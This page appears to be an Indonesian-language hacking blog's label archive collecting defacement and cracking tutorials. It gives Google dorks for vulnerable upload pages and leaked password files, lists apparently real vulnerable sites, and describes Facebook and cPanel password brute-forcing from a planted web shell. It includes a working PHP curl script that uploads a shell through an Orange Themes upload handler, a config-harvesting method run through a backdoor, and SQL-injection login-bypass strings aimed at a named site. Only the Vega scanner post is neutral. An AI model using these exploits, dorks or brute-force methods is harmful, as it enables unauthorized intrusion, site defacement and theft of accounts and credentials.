Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Minggu, 16 Februari 2014

Silentum Uploader Upload Vulnerability

Assalamualaikum...Hari ini saya nak ajar cara deface dengan mudah dan cepat, bagi newbie yang baru nak belajar deface memang sesuai untuk menggunakan cara ini dulu...
ok let's go
Dork : Inurl:upload.php intext:"htm html" site:.com / org / net etc
            Intext:Powered by: Silentum Uploader

File yang dibenarkan hanyalah yang seperti berikut: .doc, .htm, .html, .odt, .pdf, .rtf, .sxw, .txt and etc

Demo All Website Vuln


http://bn.thedocumentsguy.com/upload.php
http://site.foilgraphicsgifts.com/upload.php
http://www.thiagocavaleiro.com.br/site/upload.php
http://site.foilgraphicsgifts.com/upload.php
http://site.foilgraphicsgifts.com/upload.php
http://www.webstyling.it/script/php/upload/3/upload.php
http://www.hiphopcars.com/black_models_divas/upload.php
http://actorsal.com/upload.php
 
Sumber : GCA

Hack Akun Facebook With Python

Okke Kali Ini Saya Akan Share Tools Hack Akun Facebook With Python Inget Ya Om Trik Ini Untuk Kebaikan Jgn Di Salah Gunain (y)
1).Join Group Dulu Biar Kalo Ntar Tanya Enakk Klik Disini
2).Siapin Bahan-Bahanya Dulu :
-Python 2.7 ( Google Om Banyak )
-Toolsnya  ( Download Disni )
-Pakek Otak Buat Pikir Wordlistnya 
3).Kalo Sudah Download Python Langsung Buka CMD Letak File Saya Di LocalDisk D Maka Contohnya Seperti Ini
4).Tambahkan Tulisan Lagi facebook.py Lalu Tekan Enter
5).Kalo Sudah Begitu Masukin Emailnya Truss Wordlistnya Truss Tekan Enter Kalo Buka facebook.py Error Ntar Lihat Tutorial Di Bawah Sendiri
.Jika Error Waktu Buka File facebook.py Downlod Dulu Mechanize Klik Disini
Tuss Buka CMD Lagi Ketikan D: Enter cd mechanize Enter 
Lalu Masukan setup.py install Truss Tekan Enter Jika Terinstall Coba Ulangi Dari Nomor 4

NB : Kembangin Wordlist Biar Maknyussss
Tag : Hack Akun Facebook,Crack Akun Facebook,Hacking

Hack Facebook Menggunakan search Google

Oke Kli Ini Saya Share Hack Fb Dengan Google Search Oke Gw Males Ngetik Langsung Saja Ya

1).Buka www.google.com
2).Masukan Salah Satu Dork Di Bawah Ini

Dork:
1. intext:@ymail.com | @gmail.com | @hotmail.com | @yahoo.co.id ext:txt "facebook"

2. intext:"email=" & intext:"pass=" & intext:"charset_test=" intext:@ymail.com | @gmail.com | @hotmail.com | @yahoo.co.id ext:txt "paypal passwd" 2013
3. ext:txt "username" "password" @ymail.com OR @yahoo.com OR @msn.com OR @gmail.com 2013
4. filetype:txt & intext:"email=" & intext:"pass=" & intext:"charset_test="

3).Habis Search Google Buka Dehh


Gk Usah Repot-Repot Buat Phising Segala Hahaha

Hack cPanel With cPanel Bruteforce

Banyak Orang Yg Tanya apasih Brute Itu ?? Brute Itu Sama Aja Menebak Jadi Ente Harus Kira-Kira apa Passwordnya Nihh ane SHare Tutorial Brute cPanel Oke Tanpa Banyak Cocod Langsung Aja :D

Bahan-Bahan Untuk Tempur

-Shell (Terserah Ente Mau Pkek Shell apa)
-Wordlist Download Disini (Boleh Buat Sendiri Biar Lebih Simple,Kayak Punya Ane)
-Kopi ( Jgn Minum Sendiri Ane Di Kasih Dongg :D )


Langkah-Langkah

1).Main Dulu om Ke Gorup Klik Disini
2).Upload Shell Tadi Entah Ke Mana Pokoknya Hosting cPanelX
3).Lalu Klik cPanel Bruteforce

 

4).Nanti akan keluar halaman Seperti Ini



5).Masukan Wordlistnya usahakan simple tapi Joss Yg Ane Share Itu Wordlist Biasa,Bukaan Buatan Ane :D



6).Truss Klik Start Kalo Wordlisnya Banyak Agak Lama Nuggunya :D Jika Ada cPanel Akan Keluar Tampilan Seperti Ini, Kalo Kgk Keluar Y Wordlistny Om :D


Tuhh Nongol 14 cPanel

7).Tinggal Login Dehh Ke cPanelnya :D Heheheh



NB : Intinya Hanyalah Wordlist,Wordlist Joss cPanelnya Dapetnya Juga Joss

Content Creator : Jagad Dot ID

Deface Dengan Exploit orange themes File Upload

Assalamualaikum sobat Indonesian Attacker :)
Sekarang Ada Waktu Luang Untuk Share Tutor
Exploit orange themes File Upload

Bahan-Bahan:
-XAMPP (Serch Di Google Banyak Kok)
-Shell (Bisa Pakek Shell GCA)

Langkah-Langkah:
1).Search Di Google Gunakan Dork

inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"  

2).Ane Pkek Dork Yang inurl:"/wp-content/themes/radial-theme/"

3).Jika Ketemu Masukan Exploit /wp-content/themes/radial-theme/functions/upload-handler.php jika Keluar Error Situsnya Vuln

4).Buat File Baru Berekstensi .php Contoh lol.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit :D

<?php
$uploadfile="shellKamu.php";
$ch = curl_init("http://site.com/wp-content/themes/radial-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>



4).Masukan Shell Ente Juga Jadi Ada Dua File Di Directory C:/XAMPP/php yaitu Shell Dan Script Tadi :D



5).Aktifkan XAMPP Klik Start Pada Apache




6).Buka cmd Dengan Cara Klik Start -> Run -> Ketik "cmd"
7).Ketik cd\xampp/php



8)ketik php namascript.php Contoh: php lol.php
9).Jika Succes Akan Ada Nama Shellnya :D

10).Untuk Letak Shellnya Ada Di
http://site.com/wp-content/uploads/2013/11/namashell.php

Mencari Config Dalam Website


Hi, ketemu lagi sama ane ./Cyber404 ^_^

Kali ini aku mau kasih trik cara mendapatkan web yang 1 server sama web yang kita sudah pasang shell, kebanyakan nyebutnya CONFIG.

Ya udah tanpa mengulur waktu langsung saja kita masuk ke tutorialnya :D

[+] BAHAN [+]

  • Shell (kalau belum punya download disini)
  • MySQL (kalau belum punya klik download) #recode 




1. Siapkan website yang udah kalian tanami shell/backdoor :D (sebagai contoh saya memakai http://sariamelia.com )

2. Klik EVAL didalam shell/backdoor kalian (lihat gambar)

3. Jika sudah, lalu klik GO (lihat gambar)
4. Lalu copy semua yang terdapat dalam kolom tersebut (lihat gambar)
5. Next, kalian klik CONFIG (tampilan seperti ini)
6. Lalu, paste kode yang kalian dapat (step 4) tadi di kolom yang disediakan (lihat gambar)
7. Lalu klik HAJAR, jika sukses tampilan kurang lebih akan seperti ini
8. Sekarang tinggal kalian panggil CONFIGnya, caranya 
# Jika kalian upload shell tadi di wp-content maka manggilnya http://domain.com/wp-content/config
*intinya ganti (nama shell kamu tadi dengan "config")
9. Jika sukses, tampilan akan seperti ini
10. Sekarang tinggal upload script "mysql.php"nya :)

Sekian tutorial dari ane ./Cyber404 , kalo kurang jelas bisa tanyakan pada (./Cyber404)

#yang belum tau cara deface dengan config silahkan kesini gan :)
#Special Thanks To : Mr. Gandrunx | X Inject
Keyword : Hack Dengan Config . Cara Mencari Website Satu Server , Deface Website Mudah

Cara Crack Cpanel 2013


Assalamualaikum...

Nah, Saat ini udah banyak yg tau kan bagamana nanem shell di website? :D kalo belum tau, belajar lagi sono, :D soalnya kalo kagak bisa tanem shell bijimane mau crack cpanel :) oke dah, kali ini saya menulis artikel mengenai cara crack cpanel menggunakan Shell 1n73ction v.32 . Thankz to om X'Inject :D
Yup, Rata2 di blogg2 udah banyak yg share ni, makanya kita ga mau ketinggalan juga nih :D perlu diketahui, tutorial ini sedikit berbeda dengan tutorial kami sebelumnya, kalo belum tau silahkan baca lagi Cara Crack Cpanel, langsung dah meluncur :)

Sediakan bahan2nya dolo :D kayak mau masak aja :D

1. Shell 1n73ction v.32 | Download |

Pass File : http://indocyberarmy.blogspot.com
Pass Shell : 1n73ction

2. Web Shelled

3. Web Config

Yuk mari kita lanjutkan ke langkah langkahnya :D

Pertama tentunya kita harus punya web yg sudah ditanem shell :D



Kemudian disini saya juga udah punya Web Confignya :P kalo belum tau gimana nyari config, Lihat aja artikel Cara Mencari Config :p

Lalu pada Shell 1n73ction, klik Cpanel Bruteforce



Nah, ntar muncul dah toolsnya :)


Setelah itu, masukkan url yang berisikan config web di kolom Url Config, Liat gambar dibawah :)


Klik GO dan tunggu aja sampai selesai :)


Nah, kalo udah selesai, disitu ada kumpulan wordlist2 yang akan kita gunakan sebagai wordlist password, copy aja dan masukkan di kolom Pass.



Lalu klik Start dan tunggu dah sampe selesai :)


Tuh, udah dapet :) langsung dah loggin ke cpanelnya :)

Sekian Tutorial ane mudah2an bermanfaat,, thanks udah mampir :) jangan lupa komentarnya -_- :D

Content Creator : Onix AQua

Subgraph Vega Web Vulnerability Scanner

Vega adalah scanner gratis dan open source dan platform penetration test untuk menguji keamanan aplikasi web. Vega dapat membantu Anda menemukan dan memvalidasi SQL Injection, Cross-Site Scripting (XSS),  mengungkapkan informasi sensitif, dan kerentanan lainnya. Scanner ini ditulis dalam bahasa Java, yang berbasis GUI, dan dapat berjalan pada Linux, OS X, dan Windows.

Vega mencakup scanner otomatis untuk pengujian secara cepat dan memiliki fitur proxy dalam pemeriksaan taktis. Vega scanner dapat menemukan XSS (cross-site scripting), injeksi SQL, dan kerentanan lainnya. Vega dapat dikembangkan dengan menggunakan API dalam bahasa web: Javascript.

FETURES

Modules
  • Cross Site Scripting (XSS)
  • SQL Injection
  • Directory Traversal
  • URL Injection
  • Error Detection
  • File Uploads
  • Sensitive Data Discovery
Core
  • Automated Crawler and Vulnerability Scanner
  • Consistent UI
  • Website Crawler
  • Intercepting Proxy
  • SSL MITM
  • Content Analysis
  • Extensibility through a Powerful Javascript Module API
  • Customizable alerts
  • Database and Shared Data Model
Untuk menjalaankan scanner ini dibutuhkan aplikasi Java sebagai pendukung.
Download Subgraph Vega Web Vulnerability Scanner :

Sumber : IDCA

Tutorial Bypass SQL Login

Assalamuallaikum sobat Indonesian Attacker :)
Berhubung tadi pada minta tutorial deface, ya sudaaah saya kabulin dah. Pada artikel ini saya akan membahas mengenai "Bypass SQL Login" maksudnya gimana tuh?

Maksudnya.. dengan memanfaatkan eror pada sql website tersebut kita dapat login ke administrator web tersebut tanpa harus memasukan username dan password yang sudah dibuat admin. Singkatnya sih "bypass = bye bye password"

Oke langsung  saja kita masuk ke tutorialnya :

[#] Dork


inurl:manager intitle:Admin Panel
inurl:/admin2/ ext:php
inurk:/admin/ ext:php
inurl:/adminpanel/ ext:php
inurl:/admin_panel/
[#] Langkah-langkah

1. Masukan salah satu dork diatas ke google, lalu pilih salah satu buat demo silahkan coba web ini

http://preprojects.com/hostfriendz/int/index.php
2. Jika sudah memilih target silahkan anda coba login dengan user pass ini :
user : ' or 1=1 limit 1 -- -+ pass : ' or 1=1 limit 1 -- -+

 
Nah jika berhasil ya sudah deh terserah mau kalian apakan :D
Simpel ya hhee dah cukup itu aja kok :D

Sekian tutorial dari saya thanks to Mr Xenophobic ^_^

untuk kedepannya jika saya sudah dapat banyak refrensi, artikel ini akan saya perbarui dengan menambah macam erornya dan kenapa bisa masuk

Author : Bimo Septiawan

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Bluehost Coupons